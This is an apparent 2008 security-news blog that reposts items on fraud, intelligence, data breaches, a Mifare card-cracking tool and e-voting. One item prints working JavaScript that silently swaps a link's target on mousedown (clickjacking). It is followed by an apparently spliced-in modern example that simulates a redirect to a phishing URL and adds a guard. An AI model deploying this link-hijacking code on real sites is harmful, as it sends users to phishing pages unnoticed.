Friday, October 31, 2008

French President Sarkozy Cyber Thieves Nabbed

Via The Inquirer -

The number of arrests made by French coppers investigating theft from President Nicolas Sarkozy's online bank account has risen to six, as three more suspects were nicked on Wednesday.

Sarkozy, keeping a watchful eye on his ‘sous’ during the global financial crisis, called in police when he began noticing small amounts of dosh disappearing from his bank account. It seemed thieves had managed to get hold of Mr Le President’s online banking passwords, and had proceeded to siphon off the cash, hoping he wouldn’t notice.

Apparently the pognon taken from Sarko’s Neuilly suburb Paris account was then used by the arnaquers to top up their mobile phone subscriptions.

Five of the six suspects worked in a mobile phone shop in the French city of Rouen, with two of those arrested yesterday “suspected of having participated knowingly in opening fraudulent phone accounts” according to an AFP source.

The third voyou arrested Wednesday is “suspected of having requested the opening of the accounts,” according to the same source.

A report on French news site Mediapart claimed the Prez’s papa and ex wife were also targeted by the account robbers, making it highly unlikely that the thieves had obtained the account details 'just by chance'.

Still, with Mr Sarkozy’s £195,000-a-year salary, you would think the French President could surrender a bit of his wealth, non?


According to the Time Online UK...

The inquiry, launched last month after it emerged that he had lost €170 from his account, took a new twist when police discovered that Paul Sarkozy de Nagy-Bosca, the President’s father, and Marie-Dominique Culioli, his first wife, were also victims of the fraud.

The discovery blew apart an initial French police theory that the hackers had stumbled upon Mr Sarkozy’s account by chance. "That now seems very unlikely," said a police source.

Detectives from the elite Paris Police Financial Brigade believe he was targeted deliberately, and are attempting to determine why.

Army Adds Fiber-Optic Protection Tool to Approved List

Via -

The Army has added the Interceptor Optical Network Security System to its Information Assurance Approved Product List. Army units and installations worldwide will be able to use Interceptor to protect command and control, intelligence, surveillance and reconnaissance networks, and SCIF facilities.

The new fiber-optic protection technology from
Network Integrity Systems monitors fibers within the cable being protected to detect handling, and can be used in support of the Army’s initiative to deploy SIPRNet to each Brigade Combat Team and to enable network-centric warfare through the Army’s Area Processing Centers.

Networks carrying sensitive or classified government information rely on encryption, hardening or intrusion detection alarms to protect the information from breaches. Unlike traditional intrusion alarms, Interceptor doesn’t rely on an extra optical fiber to sense vibrations. Instead, the system monitors the lit or dark fibers in a network’s fiber cables to detect motion of the cables themselves.

The technology works with any optical cable type and is compatible with all Ethernet standards including 10 Gigabit. Because it is a physical layer device and does not touch the data, unlike encryption, Interceptor does not create any bandwidth bottlenecks. The Interceptor can work with existing networks and new installations.

Interceptor also eliminates the costs associated with hardening – the installation of concrete encasements in the outside plant and rigid metallic carrier inside the building. Additionally, periodic visual inspections, required daily for hardened carrier systems, are eliminated, along with the potential for human error or oversight.

Interceptor has been used across the Defense, Justice and Homeland Security departments.

Intel Budget Disclosure and the Myths of Secrecy

Via FAS Blog -

The Director of National Intelligence today disclosed the 2008 budget for the National Intelligence Program: $47.5 billion. That figure does not include spending for the Military Intelligence Program, which is at least another $10 billion.

The disclosure marks only the fourth time that the intelligence budget has been officially disclosed. The aggregate intelligence budget figure (including national, joint military and tactical intelligence spending) was first released in 1997 ($26.6 billion) in response to a Freedom of Information Act lawsuit filed by the Federation of American Scientists. It was voluntarily released in 1998 ($26.7 billion). The National Intelligence Program budget was next disclosed in 2007 ($43.5 billion), in response to a Congressional mandate, based on a recommendation of the 9/11 Commission. And then there was today’s release for 2008.

In recent years, the most passionate opponent of intelligence budget disclosure has been none other than Sen. Ted Stevens (R-AK), whose own financial non-disclosure practices have recently earned him multiple felony convictions.

In an October 4, 2004 Senate floor debate, Senator Stevens usefully marshaled all of the traditional arguments against disclosure. Most of them were false at the time. Others have since been disproven.

“No other nation, friend, or ally, reveals the amount that it spends on intelligence,” Sen. Stevens said then.

In fact, the United Kingdom, Canada, the Netherlands and other countries have published their intelligence budgets for many years without adverse effect.

“Determining classification is the responsibility and duty of the chief executive of the United States, the President, who is also Commander in Chief,” said Sen. Stevens. “Presidents Truman through Bush has determined that the overall intelligence budget top-line figure is, and shall remain, classified, and I believe we should not overrule that judgment.”

But Congress shares responsibility for defining the terms of the classification system. And as a factual historical matter, President Clinton approved disclosure of the intelligence budget total.

The hoariest myth of all, renewed by Sen. Stevens, is that “This is a slippery slope. Reveal the first number and it will be just a matter of minutes before there will be a call to reveal more information.”

The notion of a “slippery slope” resulting from disclosure of the top-line budget figure has been asserted for decades even by officials who are not convicted felons. But by now, it has been conclusively disproven. Disclosure of the intelligence budget total has not led to uncontrolled further disclosures. The 9/11 Commission’s 2004 recommendation that budgets for “component agencies” should also be disclosed was not accepted and such further disclosures have not occurred despite release of the total figure.

But today the intelligence budget continues to serve as a useful barometer of the incoherence of official secrecy policy. Thus, even after declassifying the FY 2007 intelligence budget figure last year, the Office of the Director of National Intelligence concluded last summer (pdf) that “The size of the National Intelligence Program budget for Fiscal Year 2006 is properly classified.”

It seems unlikely that both positions are correct.

State Department Warns of Possible Identity Theft

Via AP -

The State Department said Friday it has warned nearly 400 passport applicants of a security breach in its records system that may have left them open to identity theft.

The department has so far notified 383 people — most of them in the Washington, D.C. area — that their passport applications containing personal information, including Social Security numbers, may have been illegally accessed and used to open fraudulent credit card accounts, spokesman Sean McCormack said.

More may be notified as an investigation continues, he said, adding that most of those contacted had not been victimized by identity thieves but all have been offered free credit monitoring for a year.

The breach came to light in March around the same time the department was grappling with cases of workers improperly snooping in the passport application files of presidential candidates, celebrities and athletes, McCormack said. However, he said the cases are not related.

The department notified the 383 passport applicants of their potential vulnerability in August and earlier this month while working with Washington police investigating a credit card and identity theft ring, he said.

The ring was exposed after the March arrest of a man found with 19 credit cards in different names and eight completed passport applications. The names of four of those applicants matched those on four of the credit cards, according to documents filed in the U.S. District Court for the District of Columbia.

McCormack declined to comment on how the man obtained the applications, but said at least one State Department worker had been reassigned and might face further disciplinary action pending completion of the investigation.

Following the passport snooping incidents, the department stepped up security for its passport records management, restricting the number of people with access and stepping up mandatory audits and monitoring of the files.


I found this story over on the OSF Data Loss Database. Make sure to check it out, if you haven't already.

Army Intelligence on the Twitter Threat

Via FAS Blog -

Could terrorists use Twitter, the instant messaging and micro-blogging service? Presumably so, just as they could use credit cards and can openers.

The potential use of Twitter and other communications technologies by terrorists is considered in a new draft Army intelligence paper, based on a review of jihadist web sites and other public sources.

The Army paper on “al Qaida-Like Mobile Discussions & Potential Creative Uses” was dissected by Noah Shachtman in “Spy Fears: Twitter Terrorists, Cell Phone Jihadists,” Danger Room, October 24. A copy of the paper itself, which is more like a student exercise than a finished intelligence assessment, is available here (large pdf, for official use only).


Terrorists can also call each other to pass along real-time intelligence.... The use of Twitter and other near real-time communication services should be understood.

Twitter is a tool, just like a hammer - it can be used for good or for bad.

Recycled Tapes Yield Data On Former Owners

Via Dark Reading -

The widespread process of erasing data storage tapes and "recertifying" them for sale isn't safe and could cause enterprises to expose sensitive business data, a major tape vendor said yesterday.

Imation, which makes tape cartridges and other storage media, says there's no way to completely erase the data that has been recorded on computer tape.

"Today's tape cartridges have storage capacities of 500 gigabytes or more. Even if 99.9 percent of data is erased from a tape, hundreds of megabytes of potentially sensitive data could remain on the tape," says Subodh Kulkarni, vice president of global commercial business, R&D, and manufacturing at Imation. "This could include thousands of customer names and Social Security numbers."

To prove its point, Imation purchased 100 recertified tapes from mainstream channels and scoped each one to see what data it could find. According to its report, the company found sensitive data from a major U.S. bank -- including employee credit card records, computer user names, and server inventories. It also found detailed patient information from a major U.S. hospital, field research data from a scientific research center, and details on the Human Genome Project from a large university.

"In our lengthy testing and analysis, which has spanned many months, we have confirmed industry guidance that the only way to properly dispose of data is to destroy the media itself," Kulkarni says. "The technical truth is there is no practical and secure way to completely erase and 'recertify' most used tape products."

Imation's conclusions could certainly be seen as self-serving, since the company loses dollars to the recertified tape market every day. But other studies, including one published several years ago by Computer Technology Review, have arrived at similar conclusions. Several other tape storage vendors, including Maxell and FujiFilm, have published similar studies.

Graham Media, one of many vendors that sells recertified tapes, asserts that the risk of buying recycled media is negligible. "Any data that remains on the tape is not usable/readable, much in the same way that old unreadable data resides in every overwritten tape cartridge in every data center in the world," the company said in a written response to tape vendors' warnings about recertified media.

Nuclear Missile Silo Fire Went Undetected, Burned Out After Several Hours

Via -

DENVER - A fire caused $1 million worth of damage at an unmanned underground nuclear launch site last spring, but the Air Force didn't find out about it until five days later, an Air Force official said Thursday.

The May 23 fire burned itself out after an hour or two, and multiple safety systems prevented any threat of an accidental launch of the Minuteman III missile, Maj. Laurie Arellano said. She said she was not allowed to say whether the missile was armed with a nuclear warhead at the time of the fire.

Arellano said the Air Force didn't know a fire had occurred until May 28, when a repair crew went to the launch site — about 40 miles east of Cheyenne, Wyo., and 100 miles northeast of Denver — because a trouble signal indicated a wiring problem.

She said the flames never entered the launch tube where the missile stood and there was no danger of a radiation release.

The fire, blamed on a faulty battery charger, burned a box of shotgun shells, a shotgun and a shotgun case that were kept in the room, Arellano said. A shotgun is a standard security weapon at missile silos.

Arellano said the battery chargers at all U.S. missile launch sites have been replaced.

She said the incident wasn't reported sooner because of the complexity of the investigation.

The damage from the fire was estimated at $1 million, including the cost of replacing damaged equipment and cleanup.


That is one expensive shotgun...

Clickjacking Technique Using the 'onmousedown' Event

Via BreakingPoint Labs Blog -

A few weeks ago, Tod Beardsley wrote about (not) 'clickjacking' here on the BreakingPoint Systems blog. He covered a number of techniques to accomplish generating a 'popup' window without triggering any of the traditional popup protections that some browsers feature. The idea was essentially to cause the user to 'request' the popup, thus making it legitimate in the eyes of the browser. Later, he covered his speculation on the 'real clickjacking' attack, which didn't use JavaScript at all but rather did some interesting CSS overlay trickery to hijack a link out from under the user as they clicked on it.

During some research that I was recently performing that I'll likely post about a little later, I discovered another technique that's a bit of a middle-ground between the two methods that Tod was discussing in his blog posts. He came close to this one with his hooking of the 'onmouseup' event, however he was having it spawn a completely new window (the popup) in addition to following the link rather than 'jacking the click' and sending it somewhere entirely different. This is essentially the same type of event hooking technique, but it is used to accomplish actual replacement of the link's target URL.

The following JavaScript function accepts as arguments a link object such as you would find in the document object's links array and a URL that you want to override the original link's URL with:

function AddJacker(link, url) {
    if ( link.addEventListener ) {
        // W3C DOM: register alongside any handlers already on the link
        link.addEventListener("mousedown", function(e){link.href=url;}, false);
    } else if ( link.attachEvent ) {
        // Legacy IE (pre-IE9) event model
        link.attachEvent("onmousedown", function(e){link.href=url;});
    } else {
        // Fallback: wrap any existing inline onmousedown so it still runs first
        var oldhandler = link["onmousedown"];
        if ( oldhandler ) {
            link["onmousedown"] = function(e){oldhandler(e);link.href=url;};
        } else {
            link["onmousedown"] = function(e){link.href=url;};
        }
    }
}
What this essentially does is create an event handler for the 'onmousedown' event for the target link. When the user clicks on the link, the 'onmousedown', 'onclick', and 'onmouseup' events are fired. Since the 'onmousedown' event happens first, the event handler is called which replaces the link object's href value with the new target URL, which happens before the user is sent on their way to that link's target URL.

The interesting bit about this technique in comparison to the 'onmouseup' technique that Tod was using is that it doesn't result in the user both going to the original target as well as the new target; they are only redirected to the new target, completely overriding the original target. Like Tod's technique, because the new target URL is hiding in a function that is handling the 'onmousedown' event, a mouseover of the link in the browser indicates that it is still targeting the link's original URL. The replacement of the URL doesn't happen until the user actually clicks on the link.
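The swap described above, modelled end to end as an added example (this is not code from the BreakingPoint post). It runs in Node without a browser: the FakeLink class is a constructed stand-in for an anchor element that implements only the slice of the DOM event API the technique needs, and the event sequence it replays is the real browser order for a pointer click, mouseover, mousedown, mouseup, then click. The installClickGuard function is an assumed defence added for contrast, not something the post proposes: it snapshots the href when the pointer enters the link and cancels the click if the target changed underneath the user.

```javascript
// Added example: the mousedown href-swap and a snapshot-based guard, run
// against a constructed stand-in for an <a> element (no browser needed).

class FakeLink {
  constructor(href) {
    this.href = href;
    this.listeners = {};               // event type -> [handler, ...]
  }
  addEventListener(type, handler) {
    (this.listeners[type] = this.listeners[type] || []).push(handler);
  }
  // Returns false if a handler called preventDefault(), as the DOM does.
  dispatchEvent(type) {
    const event = {
      type,
      target: this,
      defaultPrevented: false,
      preventDefault() { this.defaultPrevented = true; },
    };
    for (const handler of this.listeners[type] || []) handler(event);
    return !event.defaultPrevented;
  }
}

// The post's technique reduced to its addEventListener branch: the href is
// rewritten on mousedown, before the click that triggers navigation.
function addJacker(link, url) {
  link.addEventListener("mousedown", function () { link.href = url; });
}

// Replay a user hovering over and clicking the link. `shown` is the URL the
// status bar would display on hover; `navigatedTo` is where the click goes.
function simulateClick(link) {
  const shown = link.href;
  link.dispatchEvent("mouseover");
  link.dispatchEvent("mousedown");
  link.dispatchEvent("mouseup");
  const allowed = link.dispatchEvent("click");
  return { shown, navigatedTo: allowed ? link.href : null, blocked: !allowed };
}

// Assumed defence (not from the original post): remember the href the user
// saw on hover and refuse the click if it no longer matches.
function installClickGuard(link) {
  let seen = null;
  link.addEventListener("mouseover", function () { seen = link.href; });
  link.addEventListener("click", function (e) {
    if (seen !== null && link.href !== seen) e.preventDefault();
  });
}

// Constructed URLs for the demonstration; attacker.invalid is a reserved TLD.
function demo() {
  const honest = new FakeLink("https://example.org/login");

  const jacked = new FakeLink("https://example.org/login");
  addJacker(jacked, "https://attacker.invalid/phish");

  const guarded = new FakeLink("https://example.org/login");
  installClickGuard(guarded);
  addJacker(guarded, "https://attacker.invalid/phish");

  return {
    honest: simulateClick(honest),
    jacked: simulateClick(jacked),
    guarded: simulateClick(guarded),
  };
}
```

Two caveats worth keeping in mind. Keyboard activation (Tab to the link, press Enter) fires no mousedown, so a jacked link followed that way goes to its original target; the technique only catches pointer clicks. And the script that calls addJacker has to be running in the page already, so the realistic threat is injected or third-party script, which makes script-injection controls such as a restrictive Content-Security-Policy the primary mitigation; the guard above is illustrative rather than a substitute for them.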


Thursday, October 30, 2008

EstDomains Update: Notice of Termination Stayed

Via -

On 28 October 2008, ICANN sent a notice of termination to EstDomains [PDF, 76K]. Based on an Estonian Court record, ICANN has reason to believe that the president of EstDomains, Vladimir Tsastsin, was convicted of credit card fraud, money laundering and document forgery on 6 February 2008.

Pursuant to Section 5.3 of the Registrar Accreditation Agreement (RAA), ICANN may terminate the RAA before its expiration when, “Any officer or director of [a] Registrar is convicted of a felony or of a misdemeanor related to financial activities, or is adjudged by a court to have committed fraud or breach of fiduciary duty, or is the subject of judicial determination that ICANN deems as the substantive equivalent of any of these; provided such officer or director is not removed in such circumstances.”

ICANN received a response from EstDomains regarding the notice of termination. [PDF, 853K] To assess the merits of the claims made in EstDomains’ response, ICANN has stayed the termination process as ICANN analyzes these claims.

ICANN’s records indicate that EstDomains has approximately 281,000 domain names under its management. ICANN will take all reasonable measures to protect the interests of registrants during the stay period and the subsequent termination process that may follow. For information regarding ICANN’s De-Accredited Registrar Transition Procedure, please go to: [PDF, 119K].

Intel Report: Iran Plans Secret Nuclear Experiments

Via Yahoo! News -

VIENNA, Austria – Iran has recently tested ways of recovering highly enriched uranium from waste reactor fuel in a covert bid to expand its nuclear program, according to an intelligence assessment made available to The Associated Press.

The intelligence, provided by a member of the 145-nation International Atomic Energy Agency, also says a report will soon be submitted to the Iranian leadership for a decision on whether to go ahead with the project.

The alleged tests loosely replicate Saddam Hussein's attempts to build the bomb nearly two decades ago. But experts question the conclusion by those providing the intelligence that Tehran, too, is trying to reprocess the fuel to make a nuclear weapon.

They note that the spent fuel at issue as the source of the enriched uranium is not enough to yield the approximately 30 kilograms (65 pounds) of weapons-grade material needed for a bomb.

Still, they say that the alleged experiment appears plausible — if not as a fast track to weapons capability then as a step that could move it further along that path.

With Iran's nuclear program already under international scrutiny, any new efforts by Tehran to increase its nuclear expertise and its store of enriched uranium would set off alarm bells — particularly if that stock was highly enriched. The higher the enrichment the easier it is to reach the 90 percent level used in the fissile core of nuclear warheads.

The 3-page intelligence report, drawn from Iranian sources within the country, says the source material would be highly enriched — some at above 90 percent, the rest at 20 percent.

In contrast, Iran's enrichment program under constant IAEA monitoring has churned out material that is less than 5 percent enriched, in line with the fuel needs of modern reactors.

"Procedures were evaluated for recycling fuel by dissolving fuel rods" for irradiated waste and then reprocessing the material into uranium metal, says the intelligence assessment. Uranium metal is used for nuclear warheads.

"Sufficient data was collected for planning production lines for recovering the fuel," says the assessment, which gave Tehran's Jaber ibn Hayan Laboratories, run by the Atomic Energy Organization of Iran, as the location for the experiment.

Top officials of AEOI are "in the final stages" of writing a report for the Iranian leadership for assessment on whether to go forward with reprocessing, according to the intelligence.

The laboratories and the Tehran Nuclear Research Center, the site of the reactor, have figured in suspect experiments, including clandestine plutonium separation attempts uncovered by the IAEA.

If the information is accurate then Iran is "trying to get their nose in the tent" of reprocessing material potentially suitable for a warhead, said David Albright, whose Washington-based Institute for Science and International Security tracks suspect secret proliferators.

"On the surface it may have nothing to do with making a bomb, but in the end that's what it could be about."

Israeli Hacker 'The Analyzer' Indicted in New York

Via Wired -

Israeli hacker Ehud "The Analyzer" Tenenbaum was indicted Tuesday by a federal grand jury in Brooklyn on felony charges of conspiracy and fraud.

Between Feb. 2008 and May 2008 Tenenbaum and others engaged in a scheme to initiate transactions on account numbers belonging to other people, "to receive payment and other things" with an aggregate value of more than $1,000, the indictment charges (.pdf).

The U.S. attorney's office in New York did not immediately respond to a call for comment.

Tenenbaum (shown at right in an old photo) achieved worldwide notoriety as a teenager in 1998, when he was caught pulling off a series of recreational intrusions into Pentagon computers, in an investigation the Defense Department code named "Solar Sunrise."

Harvard Professor Offers New Challenge to RIAA

Via ComputerWorld -

A Harvard law professor has opened a new front in the battle between the Recording Industry Association of America (RIAA) and alleged music pirates by challenging the constitutionality of a statute being used by the industry group to bring lawsuits against alleged copyright violators.

The case involves an individual named Joel Tenenbaum, who was sued by the RIAA for allegedly illegally copying and distributing copyrighted songs belonging to several music labels. The lawsuit was filed in U.S. District Court in Boston in August 2007 after what the music labels claimed was more than two years of effort trying to get Tenenbaum to accept a settlement involving an undisclosed amount.

The music labels claimed to have discovered more than 800 copyrighted songs stored on a shared folder in Tenenbaum's computer, though only seven of those songs are specified in the case.

Harvard Law School professor Charles Nesson this week filed a counterclaim on behalf of Tenenbaum, challenging both the constitutionality of the Digital Theft Deterrence and Copyright Damages Improvement Act of 1999 and the music labels' use of it against Tenenbaum. The claim is notable because it is broader than previous challenges related to the constitutionality of the RIAA's antipiracy campaign.

Nesson's move adds to the growing number of challenges being thrown at the RIAA's campaign from several quarters. Most of the recent ones have focused on the industry group's use of a company called MediaSentry Inc. to gather evidence against alleged copyright violators. Several groups, including the Massachusetts State Police, Oregon's attorney general and Central Michigan University in Mount Pleasant, have called MediaSentry an unlicensed private investigator that is unlawfully collecting information on behalf of the RIAA.

In his motion, Nesson argued that the statute was essentially a criminal statute, and that it was unconstitutional to apply the law to prosecute a civil case in federal court, which is where previous RIAA lawsuits have been argued. He sought damages on behalf of Tenenbaum for what he claimed was the RIAA's abuse of process in pursuing the case.

He also challenged the constitutionality of the steep penalties for copyright violations that are provided under the act. The penalties range from $750 to $30,000 per infringement, with a maximum of $150,000 for certain willful violations. Last year, Jammie Thomas was ordered by a federal jury in Duluth, Minn., to pay $220,000 to six music companies for illegally downloading and sharing copyrighted music over a peer-to-peer network.

Nesson argued that such fines are "grossly excessive" and far beyond the rational measure of any financial damage that may have been caused by Tenenbaum's alleged piracy.

Does Anyone Expect Apple’s Ads to be Truthful?

Via ZDNet -

I’ll be honest with you, I find most of Apple’s ads to be funny. However, I don’t expect them to be truthful.

For example, take Bean Counter, one of Apple’s latest 30 second TV/web ads which pokes fun at Microsoft’s ad spending (kinda ironic, don’t you think, bringing out an ad to criticize another company’s ad spending).

It turns out that the premise of this ad (that Microsoft spends more money on ads than it does on R&D) is totally bogus. In fact, it’s a lie. The truth is that Apple spends far less on R&D than Microsoft does, and for the 2007 financial year Apple was only spending 0.7 cents less on advertising than Microsoft was:

For each $1 of sales Apple spends:

- 1.9 cents on Advertising
- 3.3 cents on R&D

For each $1 of sales Microsoft spends:

- 2.6 cents on Advertising
- 13.9 cents on R&D

Apple ads are an example of what Apple does best - create a reality distortion field that relies on twisting the facts to fit in with what the Mac crowd (and now the anti-Vista crowd) want to hear. The latest ads prove this by not featuring or even mentioning any Apple products throughout the course of the ad.

Apple ads are successful because they manage to get people to drop their guard. It’s just like going on a tour of a haunted house because you’re willing to suspend belief and let all the garbage and drivel wash over you just for a little entertainment.

Compare Apple’s negative spin ads to Microsoft’s ads, which are vague and overall unfunny, and choose to push “Windows” and “I’m a PC” rather than the Vista brand. Maybe Microsoft could spice up its ads with a few lies.

Bomb Attacks in India Kill at Least 67

Via NYTimes -

NEW DELHI — A series of apparently synchronized explosions tore through four towns in the troubled state of Assam in northeastern India on Thursday, killing at least 67 people and leaving more than 210 wounded, according to witnesses and police.

The bombs targeted crowded markets and government buildings like courts and police stations, witnesses said. The attacks, among the bloodiest in recent months, left streets littered with bodies and the wreckage of cars and motorcycles, according to witnesses and photographers at the scene.

There were no immediate reports that any group had taken responsibility for the bombings.

For many years, Assam state has been riven by a separatist insurgency led by the United Liberation Front of Assam, which demands independence for the region of some 26 million people and is often blamed by the authorities for bombings. Last month, ethnic clashes left 57 people dead in the area when indigenous Bodos fought with Bengali-speaking Muslims.

According to witnesses and the police, at least nine blasts rocked the four towns attacked on Thursday, including three in the state capital, Guwahati. One of the bombs there had been left in the parking lot of the district court.

Thousands of Syrians Protest US Raid

Via VOA News -

The Syrian government appears to have mobilized tens of thousands of people, busing them in to Damascus from far-flung corners of the country. They were demonstrating against an American raid in eastern Syria, which the United States says targeted and killed a top al-Qaida operative. Edward Yeranian reports for VOA from Cairo.

Syrian government television showed images of tens of thousands of demonstrators, waving banners and shouting slogans in support of President Bashar al Assad, in what appeared to be a mostly peaceful, government-sponsored protest of a raid in eastern Syria, widely believed to be conducted by the United States. The United States has not formally acknowledged involvement.

The American Embassy in Damascus was closed, for safety reasons. Hundreds of armed Syrian riot police surrounded the building to keep demonstrators away. The U.S. Cultural Center, as well as the American Community School were also closed for the day.

Syria's official news agency, SANA, quotes Deputy Foreign Minister Faisal al Miqdad as saying that Damascus is awaiting official explanation from the United States and Iraqi governments on what he calls an unacceptable violation of Syrian sovereignty.

Unconfirmed reports say that Damascus has asked the United States to close its embassy, the U.S. Cultural Center and the American School by next week.

Crypto Hash Algorithm Competition Set to Begin

Via Network World -

Security experts vying to have their technology selected as the next cryptographic-hash algorithm standard for the U.S. government need to submit their entries this week. Then they will have a long wait ahead: The new Secure Hash Algorithm standard isn't expected to be chosen until 2012.

A cryptographic hash algorithm is a marvel of ingenuity, allowing functions such as digital signatures, content verification and other security processes, including malware scanning. The current Secure Hash Algorithm (SHA) variants SHA-1 and SHA-2 aren't yet thought to be broken, but serious attacks against their core have been known for some time. With an eye on finding a better crypto hash algorithm, the National Institute of Standards and Technology (NIST) last year announced it's holding a competition to review public entries for a hoped-for new standard.

One contender, which was disclosed today, is "Skein," developed by Bruce Schneier with colleagues Niels Ferguson, Stefan Lucks, Doug Whiting, Mihir Bellare, Tadayoshi Kohno, Jon Callas and Jesse Walker.

Working together as friends, these security experts have jobs at Microsoft, Bauhaus-Universitat Weimar, BT Group, Hifn, the University of California, the University of Washington, PGP and Intel.

Although Skein may look like something from some "powerful industry consortium," its creators point out in their 75-page document submission that this is not the case.

"Our employers have kindly agreed to let us do this work, but most of it was done on our own time," Skein's creators say. "Really, they have only the vaguest idea what we're doing." The Skein collective adds: "We had lots of fun."

Skein "is really fast, really flexible," says Schneier, chief security technology officer of BT Group. "It's really simple and secure."

The Skein algorithm family works from 256-bit to 1,024-bit in strength, 512-bit representing the primary proposal. "Skein-256 is our low-memory variant," the Skein document states, while "Skein-1024 is our ultra-conservative variant." The block cipher at the core of Skein is called Threefish.

Programming Tools for Cracking Mifare Published

Via Heise Security -

A hacker using the pseudonym Bla has published an open source tool called Crapto1 for cracking the encryption of the Mifare Classic RFID chip, as used in the Oyster Card. Besides an implementation in C of the vulnerable Crypto1 algorithm, the archive also contains the C source code for an attack that has been described in a paper by Dutch security researchers at Radboud University.

Using the tool it is said to be possible to calculate the access code of a Mifare Classic card within around two seconds. All an attacker requires is a live recording of an encrypted radio communication between the card and a legitimate reader, as well as a little programming knowledge. The access code then allows him not only to decode the encrypted data, but also to manipulate the card's content virtually without limit and to clone it to obtain services fraudulently.

Wednesday, October 29, 2008

Georgia Accused of Targeting Civilians

Via BBC -

The BBC has discovered evidence that Georgia may have committed war crimes in its attack on its breakaway region of South Ossetia in August.

Eyewitnesses have described how its tanks fired directly into an apartment block, and how civilians were shot at as they tried to escape the fighting.

Research by the international investigative organisation Human Rights Watch also points to indiscriminate use of force by the Georgian military, and the possible deliberate targeting of civilians.

Indiscriminate use of force is a violation of the Geneva Conventions, and serious violations are considered to be war crimes.

The allegations are now raising concerns among Georgia's supporters in the West.

British Foreign Secretary David Miliband has told the BBC the attack on South Ossetia was "reckless".

He said he had raised the issue of possible Georgian war crimes with the government in Tbilisi.

The evidence was gathered by the BBC on the first unrestricted visit to South Ossetia by a foreign news organisation since the conflict.

Georgia's attempt to re-conquer the territory triggered a Russian invasion and the most serious crisis in relations between the Kremlin and the West since the Cold War.

And Georgians themselves have suffered. We confirmed the systematic destruction of former Georgian villages inside South Ossetia.

Some homes appear to have been not just burned by Ossetians, but also bulldozed by the territory's Russian-backed authorities.

The war began when Georgia launched artillery attacks on targets in the South Ossetian capital, Tskhinvali, at about 2330 on 7 August 2008.

Georgia said at the time that it was responding to increasing attacks on its own villages by South Ossetia militia, although it later said its action was provoked by an earlier Russian invasion.


The Russian prosecutor's office is investigating more than 300 possible cases of civilians killed by the Georgian military.

Some of those may be Ossetian paramilitaries, but Human Rights Watch believes the figure of 300-400 civilians is a "useful starting point".

That would represent more than 1% of the population of Tskhinvali - the equivalent of 70,000 deaths in London.

Allison Gill, director of the Moscow office of Human Rights Watch, said: "We're very concerned at the use of indiscriminate force by the Georgian military in Tskhinvali.

"Tskhinvali is a densely populated city and as such military action needs to be very careful that it doesn't endanger civilians."

"We know that in the early stages there were tank attacks and Grad rockets used by Georgian forces," she added.

Cybercrime is Recession-Proof

Via Dark Reading -

One industry sector is actually happy about the current state of the global economy: cybercriminals.

"One thing we've seen is financially based cybercrime is recession-proof," says Darren Mott, supervisory special agent for the FBI's Cyber Division. "With [this] changing economy, the only thing that changes is the way they go about obtaining their information."

Organized cybercrime has already begun capitalizing on the global financial crisis, cybercrime experts say, with targeted phishing attacks on customers whose banks have folded, and attacks that scam consumers who may be shopping less online, but are now spending more time at home. With fewer business and consumer targets available, the bad guys are redirecting their efforts to adapt to the market. For example, credit cards are out; debit cards are in.

"The crisis is good for cybercrime because people become more desperate for 'good deals.' It is bad for cybercrime in that they will continue operations much like they do now, but have to move around more often," says security expert Gadi Evron.

And they are already on the move: A wave of targeted phishing attacks on doomed banks and brokerages has been spotted by The Shadowserver Foundation during the past few weeks. "They were crafted a little better, mentioning the affected banks," as well as some that posed as the Better Business Bureau, says Andre' DiMino, co-founder and director of Shadowserver. "They are almost preying on how people are trying to be more savvy in what they buy and what they are doing as they are more careful in where they spend."

One attack used Citigroup's attempted takeover of Wachovia as a premise for stealing Wachovia customers' credentials. (Wells Fargo eventually outbid Citigroup for Wachovia). "There's been a surge in phishing, telling customers that due to the new takeover, they need new credentials," says Ori Eisen, founder and chief innovation officer for 41st Parameter. If the victim hands over his old credentials to "set" his new ones, it's game over for his bank account information.


In the past two months, researchers at Finjan have found three times the number of servers with stolen data. "Before that, we'd see five or six servers in a single month, or one every week or so. Now we're seeing four or five servers a week," says Yuval Ben-Itzhak, CTO of Finjan. "Increased phishing attacks might be the reason, and a combination of both corporate and consumer [victims]."

Other researchers have cited a direct correlation between the stock market's nosedive and an increase in cybercrime activity. (See related story, Security Weathering Economic Storm.) Ryan Sherstobitoff, chief corporate evangelist for PandaLabs, says he and his team first noticed a jump in overall malware on Sept. 16 when stocks started to dip significantly. Panda discovered a 5 to 30 percent increase in malware that day related to the recent wave of rogue antivirus adware attacks. "If the stock market is crashing, there's not a lot of confidence," Sherstobitoff says. And phony antivirus popups warning that your system-may-be-infected-so-you'd-better-run-this-scan preyed on fears, he says.

Meanwhile, law enforcement and cybercrime experts say more malicious Web sites posing as economic or financial advisory services will start to emerge in this jittery financial climate. "'Have you been victimized by your bank's closing? Check us out,'" is the type of lure the bad guys may use with these sites, DiMino says.

That means a reverse in the trend from the past few months of cybercriminals' silently infecting legitimate sites. "Expect to see malicious sites crop up that are geared to information-stealing, malware-dropping, pharming, and phishing rather than compromising legitimate sites," he says.

And just as street crime increases in times of financial stress, more novice attackers and script kiddies are likely to perform an online version of shoplifting and bank robbery. "You're going to see more quick-hit script kiddies, like street crime," DiMino says.


The insider threat, too, will likely also intensify as layoffs spread in the corporate world. "You're going to see insider attacks and less direct hacks," Shadowserver's DiMino says. "There will be more of an attempt to infiltrate from inside, with botnets and SQL injection."

With potentially fewer overall enterprise targets, cybercrime organizations could end up fighting over turf. "In general, cybercrime is nothing more than a new form of organized crime," the FBI's Mott says. "You may see more online cybercrime 'violence.' DDoS attacks may go up."

Still, the bottom line is that the crisis hasn't hurt the cybercriminal's bottom line. Nor has it slowed any activity in the bustling online black market, at least thus far. "Right now, there's no observable effect. We still see the same trading activity on IRC channels," says Guillaume Lovet, senior manager for Fortinet's Threat Response Team.


This is one of the primary reasons why security-related jobs fare better during hard economic times. We are not recession-proof by any means. I have seen several of my friends take a hit during the last year. But compared to many other job types, we ride the waves better.

But, in the end, companies just can't afford not to be secure...literally.

E-voting Fears Run High as Election Day Looms

The Register UK -

With just a week to go before the US presidential election, academics, politicians, and voters are voicing increased distrust of the electronic voting machines that will be used to cast ballots.

In early balloting in West Virginia, Texas, and Tennessee, voters using e-voting machines made by Nebraska-based Election Systems & Software (ES&S) have reported the "flipping" of their vote from the presidential candidate they selected to the candidate's rival. In some cases, voters said their choice had been changed from Democrat Barack Obama to Republican John McCain while others reported just the opposite.

